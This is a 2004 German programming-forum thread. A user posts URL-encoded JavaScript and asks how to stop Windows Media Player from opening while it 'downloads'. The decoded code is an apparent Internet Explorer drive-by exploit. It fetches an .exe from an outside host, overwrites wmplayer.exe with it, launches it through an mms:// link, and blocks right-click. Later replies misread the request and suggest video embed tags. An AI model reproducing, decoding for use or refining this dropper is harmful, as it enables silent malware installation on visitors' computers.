# Ich brauche hilfe



## Hovac (6. Mrz 2004)

Naja ich weiss jetzt nicht genau  ob das zu java passt aba ich bräuchte hilfe ich hab da so ein code und wollte wissen oda man den so bearbeiten kann damit sich nicht Windows media player offnet wenn er was downloadet.
Könnte mir da vieleicht einer helfen ??  :? 


```
document.write(unescape("%3Ctextarea%20id%3D%22code%22%20style%3D%22display%3Anone%3B%22%3E%0A%0A%20%20%20%20var%20x%20%3D%20new%20ActiveXObject%28%22Microsoft.XMLHTTP%22%29%3B%20%0A%20%20%20%20x.Open%28%22GET%22%2C%20%22http%3A//home.arcor.de/balbal/fufu.exe%20%22%2C0%29%3B%20%0A%20%20%20%20x.Send%28%29%3B%20%0A%20%20%20%20%0A%20%20%20%20var%20s%20%3D%20new%20ActiveXObject%28%22ADODB.Stream%22%29%3B%0A%20%20%20%20s.Mode%20%3D%203%3B%0A%20%20%20%20s.Type%20%3D%201%3B%0A%20%20%20%20s.Open%28%29%3B%0A%20%20%20%20s.Write%28x.responseBody%29%3B%0A%0A%20%20%20%20s.SaveToFile%28%22C%3A%5C%5CProgramme%5C%5CWindows%20Media%20Player%5C%5Cwmplayer.exe%22%2C2%29%3B%0A%20%20%20%20location.href%20%3D%20%22mms%3A//%22%3B%0A%0A%3C/textarea%3E%0A%0A%3Cscript%20language%3D%22javascript%22%3E%0A%0A%20%20%20%20function%20preparecode%28code%29%20%7B%0A%20%20%20%20%20%20%20%20result%20%3D%20%27%27%3B%0A%20%20%20%20%20%20%20%20lines%20%3D%20code.split%28/%5Cr%5Cn/%29%3B%0A%20%20%20%20%20%20%20%20for%20%28i%3D0%3Bi%3Clines.length%3Bi++%29%20%7B%0A%20%20%20%20%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20%20line%20%3D%20lines%5Bi%5D%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20line%20%3D%20line.replace%28/%5E%5Cs+/%2C%22%22%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20line%20%3D%20line.replace%28/%5Cs+%24/%2C%22%22%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20line%20%3D%20line.replace%28/%27/g%2C%22%5C%5C%27%22%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20line%20%3D%20line.replace%28/%5B%5C%5C%5D/g%2C%22%5C%5C%5C%5C%22%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20line%20%3D%20line.replace%28/%5B/%5D/g%2C%22%252f%22%29%3B%0A%0A%20%20%20%20%20%20%20%20%20%20%20%20if%20%28line%20%21%3D%20%27%27%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20result%20+%3D%20line%20+%27%5C%5Cr%5C%5Cn%27%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20return%20result%3B%0A%20%20%20%20%7D%0A%20%20%20%20%0A%20%20%20%20function%20doit%28%29%20%7B%0A%20%20%20%20%20%20%20%20mycode%20%3D%20preparecode%28document.all.code.value%29%3B%0A%20%20%20%20%20%20%20%20myURL%20%3D%20%22file%3Ajavascript%3Aeval%28%27%22%20+%20mycode%20+%20%22%27%29%22%3B%0A%20%20%20%20%20%20%20%20window.open%28myURL%2C%22_media%22%29%3B%0A%20%20%20%20%7D%0A%20%20%20%20%0A%0A%20%20%20%20window.open%28%22error.php%22%2C%22_media%22%29%3B%0A%20%20%20%20%0A%20%20%20%20setTimeout%28%22doit%28%29%22%2C%205000%29%3B%0A%20%20%20%20%0A%20%20%20%20%0A%3C/script%3E%0A%3Cscript%3E%20%3C%21--%20%0Afunction%20click%28e%29%7Bif%28document.all%29%20if%20%28event.button%20%3D%3D%202%29%20return%20false%3Bif%20%28document.layers%29%20%0Aif%20%28e.which%20%3D%3D%203%29%20return%20false%3B%7D%20function%20%0Aclick2%28%29%7Bevent.returnValue%3Dfalse%3Breturn%20%0Afalse%3B%7D%20if%20%28document.layers%29%20document.captureEvents%28Event.MOUSEDOWN%29%3B%20%0Adocument.onmousedown%3Dclick%3Bdocument.oncontextmenu%3Dclick2%3B%20%0A//%20--%3E%20%3C/SCRIPT%3E%0A%0A%3Cnoscript%3E%3Cnoscript%3E%3Cplaintext%3E%3C/noscript%3E%0A%0Asie%20werden%20gleich%20weitergeleitet"));
//-->
```


----------



## bygones (6. Mrz 2004)

:shock: bin ich der einzige der nichts versteht  :? 

Was ist das denn -??????


----------



## Roar (6. Mrz 2004)

maaahn erstens ist das javascript, hat aber nix mit javascript zu tun, sondern eher mit html.
zweitens: wieso gibst du uns da snicht in einem normalern format. wo hast du denn den bescheuerten code geklaut?
drittens: wenn ich dich richtig verstehe willst du ein video in ein HTML Dokument einbetten. dafür nimm den object-tag. wie der zu benutzen ist weiß ich nicht, aber dsamit kannst du das windoof media player plugin oder quick time ansprechen - normalo heisst das, dass du das video in der website abspielen kannst. 
selfhtml weiß mehr
oder du benutzt dreamweaver, da kann man einfach objects einbetten


----------



## Campino (16. Mrz 2004)

Roar hat eigentlich recht. Aber ich bin für den embed-Tag, weil ältere Browser den Object-Tag nicht kennen.

Das geht dann so:

```
<embed src="film.avi" width="180" height="180" autostart="true"></embed>
```

 :arrow: width und height erhalten höhe und breite des Videos(Überraschung!  ). 
 :arrow: autostart auf true heißt, dass der film schon beim öffnen der Seite losspielt, wenn du da als Parameter false übergibst, spielt er erst auf Knopfdrück(den entsprechenden Knopf machen die Browser selber).


----------

